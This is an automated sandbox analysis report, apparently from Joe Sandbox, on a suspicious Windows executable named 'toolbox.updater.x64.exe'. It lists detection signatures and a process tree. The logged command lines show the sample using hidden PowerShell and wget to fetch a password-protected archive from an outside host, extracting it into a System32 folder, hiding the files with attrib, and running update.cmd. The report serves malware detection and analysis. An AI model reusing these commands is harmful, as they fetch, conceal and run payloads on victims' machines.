Joe Sandbox Cloud Basic Analysis Report
Create Interactive Tour

Analysis Report toolbox.updater.x64.exe

Overview

General Information

Sample Name:toolbox.updater.x64.exe
Analysis ID:323322
MD5:bde4351613c5ebf5c4b30729ab50acd0
SHA1:13ebbf56e7d93482712dcd4c6b6866a40e5560db
SHA256:0cf73f9d6f6ca82b35c79ea947026f3f1c87d6dc12bf6591357ba417fdebe3df

Most interesting Screenshot:

Detection

Score:26
Range:0 - 100
Whitelisted:false
Confidence:80%

Signatures

Suspicious powershell command line found
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious

Startup

  • System is w10x64
  • toolbox.updater.x64.exe (PID: 7160 cmdline: 'C:\Users\user\Desktop\toolbox.updater.x64.exe' MD5: BDE4351613C5EBF5C4B30729AB50ACD0)
    • conhost.exe (PID: 5720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 496 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -WindowStyle Hidden wget\wget -q --show-progress --progress=dot --backups=1 http://xcazy.the-ninja.jp/update/2020/x64/ghost.toolbox.7z -t 5 MD5: 95000560239032BC68B4C2FDFCDEF913)
    • powershell.exe (PID: 6136 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -WindowStyle Hidden wget\7z1900-extra\x64\7za x ghost.toolbox.7z -aoa -pxxxxxxxx -oC:\Windows\System32\wbem\en-US MD5: 95000560239032BC68B4C2FDFCDEF913)
    • attrib.exe (PID: 6664 cmdline: 'C:\Windows\system32\attrib.exe' +S +H +R C:\Windows\System32\wbem\en-US\update.cmd MD5: FDC601145CD289C6FBC96D3F805F3CD7)
    • attrib.exe (PID: 6692 cmdline: 'C:\Windows\system32\attrib.exe' +S +H +R C:\Windows\System32\wbem\en-US MD5: FDC601145CD289C6FBC96D3F805F3CD7)
    • powershell.exe (PID: 6728 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' C:\Windows\System32\wbem\en-US\update.cmd MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 6736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

barindex
Sigma detected: Hiding Files with Attrib.exe
Source: Process startedAuthor: Sami Ruohonen: Data: Command: 'C:\Windows\system32\attrib.exe' +S +H +R C:\Windows\System32\wbem\en-US\update.cmd, CommandLine: 'C:\Windows\system32\attrib.exe' +S +H +R C:\Windows\System32\wbem\en-US\update.cmd, CommandLine|base64offset|contains: , Image: C:\Windows\System32\attrib.exe, NewProcessName: C:\Windows\System32\attrib.exe, OriginalFileName: C:\Windows\System32\attrib.exe, ParentCommandLine: 'C:\Users\user\Desktop\toolbox.updater.x64.exe' , ParentImage: C:\Users\user\Desktop\toolbox.updater.x64.exe, ParentProcessId: 7160, ProcessCommandLine: 'C:\Windows\system32\attrib.exe' +S +H +R C:\Windows\System32\wbem\en-US\update.cmd, ProcessId: 6664

Signature Overview

Click to jump to signature section

Show All Signature Results
Source: powershell.exe, 00000002.00000002.668598377.00000282B8EEC000.00000004.00000001.sdmp, powershell.exe, 00000003.00000003.679481008.000001E5F766C000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.715732922.00000252B982C000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000006.00000002.714485528.00000252B1343000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000006.00000002.707252029.00000252A1645000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: toolbox.updater.x64.exe, 00000000.00000002.694354112.0000000002531000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.669043918.00000282B9041000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.679992499.000001E580001000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.706675027.00000252A12E1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000006.00000002.707252029.00000252A1645000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.666506406.00000282B6F50000.00000004.00000020.sdmp, powershell.exe, 00000002.00000002.669043918.00000282B9041000.00000004.00000001.sdmpString found in binary or memory: http://xcazy.the-ninja.jp/update/2020/x64/ghost.toolbox.7z
Source: powershell.exe, 00000002.00000002.667108518.00000282B89F0000.00000004.00000040.sdmp, powershell.exe, 00000002.00000002.668443505.00000282B8E80000.00000004.00000001.sdmpString found in binary or memory: http://xcazy.the-ninja.jp/update/2020/x64/ghost.toolbox.7z-t5
Source: powershell.exe, 00000002.00000002.666889217.00000282B7120000.00000004.00000040.sdmpString found in binary or memory: http://xcazy.the-ninja.jp/update/2020/x64/ghost.toolbox.7z-t5sProgramFil
Source: powershell.exe, 00000002.00000002.669629568.00000282B9248000.00000004.00000001.sdmpString found in binary or memory: http://xcazy.the-ninja.jp/update/2020/x64/ghost.toolbox.7z0y2
Source: powershell.exe, 00000002.00000002.666633430.00000282B6FD6000.00000004.00000020.sdmpString found in binary or memory: http://xcazy.the-ninja.jp/update/2020/x64/ghost.toolbox.7zkA
Source: powershell.exe, 00000006.00000002.714485528.00000252B1343000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000006.00000002.714485528.00000252B1343000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000006.00000002.714485528.00000252B1343000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000006.00000002.707252029.00000252A1645000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000006.00000002.714170115.00000252A2BA3000.00000004.00000001.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000002.00000002.668658456.00000282B8F04000.00000004.00000001.sdmpString found in binary or memory: https://go.microsoft.co&
Source: powershell.exe, 00000006.00000002.714485528.00000252B1343000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeCode function: 0_2_00007FFA35BA59A40_2_00007FFA35BA59A4
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeCode function: 0_2_00007FFA35BA24D00_2_00007FFA35BA24D0
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeCode function: 0_2_00007FFA35BAAA3D0_2_00007FFA35BAAA3D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFA35BB2BD52_2_00007FFA35BB2BD5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFA35BB0D302_2_00007FFA35BB0D30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFA35BB0CD02_2_00007FFA35BB0CD0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFA35C534D63_2_00007FFA35C534D6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFA35BB19986_2_00007FFA35BB1998
Source: toolbox.updater.x64.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: toolbox.updater.x64.exeStatic PE information: No import functions for PE file found
Source: toolbox.updater.x64.exeBinary or memory string: OriginalFilename vs toolbox.updater.x64.exe
Source: toolbox.updater.x64.exe, 00000000.00000002.700903775.000000001ADE0000.00000002.00000001.sdmpBinary or memory string: originalfilename vs toolbox.updater.x64.exe
Source: toolbox.updater.x64.exe, 00000000.00000002.700903775.000000001ADE0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs toolbox.updater.x64.exe
Source: toolbox.updater.x64.exe, 00000000.00000003.658386103.000000001C27B000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs toolbox.updater.x64.exe
Source: toolbox.updater.x64.exe, 00000000.00000000.650399283.00000000000A2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameGHOST UPDATER8 vs toolbox.updater.x64.exe
Source: toolbox.updater.x64.exe, 00000000.00000002.694254248.00000000024C0000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs toolbox.updater.x64.exe
Source: toolbox.updater.x64.exe, 00000000.00000002.694470226.00000000025BF000.00000004.00000001.sdmpBinary or memory string: OriginalFileName vs toolbox.updater.x64.exe
Source: toolbox.updater.x64.exe, 00000000.00000002.693672433.0000000000610000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamenlsbres.dllj% vs toolbox.updater.x64.exe
Source: toolbox.updater.x64.exe, 00000000.00000002.693688216.000000000062A000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs toolbox.updater.x64.exe
Source: toolbox.updater.x64.exe, 00000000.00000002.693860752.0000000000820000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs toolbox.updater.x64.exe
Source: toolbox.updater.x64.exe, 00000000.00000002.694034186.0000000000890000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamenlsbres.dll.muij% vs toolbox.updater.x64.exe
Source: toolbox.updater.x64.exeBinary or memory string: OriginalFilenameGHOST UPDATER8 vs toolbox.updater.x64.exe
Source: classification engineClassification label: sus26.winEXE@13/11@0/0
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\toolbox.updater.x64.exe.logJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5720:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6736:120:WilError_01
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zdcsclge.euw.ps1Jump to behavior
Source: toolbox.updater.x64.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\toolbox.updater.x64.exe 'C:\Users\user\Desktop\toolbox.updater.x64.exe'
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -WindowStyle Hidden wget\wget -q --show-progress --progress=dot --backups=1 http://xcazy.the-ninja.jp/update/2020/x64/ghost.toolbox.7z -t 5
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -WindowStyle Hidden wget\7z1900-extra\x64\7za x ghost.toolbox.7z -aoa -pxxxxxxxx -oC:\Windows\System32\wbem\en-US
Source: unknownProcess created: C:\Windows\System32\attrib.exe 'C:\Windows\system32\attrib.exe' +S +H +R C:\Windows\System32\wbem\en-US\update.cmd
Source: unknownProcess created: C:\Windows\System32\attrib.exe 'C:\Windows\system32\attrib.exe' +S +H +R C:\Windows\System32\wbem\en-US
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' C:\Windows\System32\wbem\en-US\update.cmd
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -WindowStyle Hidden wget\wget -q --show-progress --progress=dot --backups=1 http://xcazy.the-ninja.jp/update/2020/x64/ghost.toolbox.7z -t 5Jump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -WindowStyle Hidden wget\7z1900-extra\x64\7za x ghost.toolbox.7z -aoa -pxxxxxxxx -oC:\Windows\System32\wbem\en-USJump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeProcess created: C:\Windows\System32\attrib.exe 'C:\Windows\system32\attrib.exe' +S +H +R C:\Windows\System32\wbem\en-US\update.cmdJump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeProcess created: C:\Windows\System32\attrib.exe 'C:\Windows\system32\attrib.exe' +S +H +R C:\Windows\System32\wbem\en-USJump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' C:\Windows\System32\wbem\en-US\update.cmd Jump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: toolbox.updater.x64.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: toolbox.updater.x64.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.685452875.000001E5F76CF000.00000004.00000001.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.685452875.000001E5F76CF000.00000004.00000001.sdmp
Source: Binary string: n.pdb source: powershell.exe, 00000003.00000002.685540885.000001E5F7740000.00000004.00000001.sdmp
Source: Binary string: \??\C:\Windows\System.Core.pdbv source: toolbox.updater.x64.exe, 00000000.00000002.700648095.000000001AD62000.00000004.00000001.sdmp
Source: Binary string: n.pdb- source: powershell.exe, 00000002.00000002.668658456.00000282B8F04000.00000004.00000001.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Core.pdb source: toolbox.updater.x64.exe, 00000000.00000002.700648095.000000001AD62000.00000004.00000001.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbPATHR source: powershell.exe, 00000003.00000002.685452875.000001E5F76CF000.00000004.00000001.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.668598377.00000282B8EEC000.00000004.00000001.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbI source: powershell.exe, 00000003.00000002.685452875.000001E5F76CF000.00000004.00000001.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb[G source: powershell.exe, 00000002.00000002.668598377.00000282B8EEC000.00000004.00000001.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbPRO< source: powershell.exe, 00000003.00000002.685452875.000001E5F76CF000.00000004.00000001.sdmp

Data Obfuscation:

barindex
Suspicious powershell command line found
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -WindowStyle Hidden wget\wget -q --show-progress --progress=dot --backups=1 http://xcazy.the-ninja.jp/update/2020/x64/ghost.toolbox.7z -t 5
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -WindowStyle Hidden wget\7z1900-extra\x64\7za x ghost.toolbox.7z -aoa -pxxxxxxxx -oC:\Windows\System32\wbem\en-US
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -WindowStyle Hidden wget\wget -q --show-progress --progress=dot --backups=1 http://xcazy.the-ninja.jp/update/2020/x64/ghost.toolbox.7z -t 5Jump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -WindowStyle Hidden wget\7z1900-extra\x64\7za x ghost.toolbox.7z -aoa -pxxxxxxxx -oC:\Windows\System32\wbem\en-USJump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeCode function: 0_2_00007FFA35BA1FDB push ebp; ret 0_2_00007FFA35BA201A
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeCode function: 0_2_00007FFA35BA1FB9 push eax; ret 0_2_00007FFA35BA1FBA
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeCode function: 0_2_00007FFA35BA1B00 push edx; ret 0_2_00007FFA35BA1FDA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFA35BB37E7 push esp; retf 2_2_00007FFA35BB37E8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFA35B83B47 push esp; retf 3_2_00007FFA35B83B48
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFA35BB3583 push eax; ret 6_2_00007FFA35BB3591
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFA35BB4CE5 push edi; retf 6_2_00007FFA35BB4CE6
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
